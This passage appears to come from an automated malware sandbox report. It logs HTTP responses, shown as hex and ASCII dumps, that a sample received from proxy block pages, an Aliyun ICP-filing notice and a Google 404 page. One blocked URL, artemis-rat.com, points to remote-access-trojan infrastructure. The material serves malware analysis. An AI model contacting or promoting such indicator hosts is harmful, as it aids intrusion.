content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:36:59 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 54
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13596Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.3.8Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:36:59 GMTContent-Type: text/htmlContent-Length: 3557X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Tue, 12 Mar 2024 07:36:59 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:00 GMTContent-Type: text/html;charset=utf-8Content-Length: 3629X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1561Date: Tue, 12 Mar 2024 07:37:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:00 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 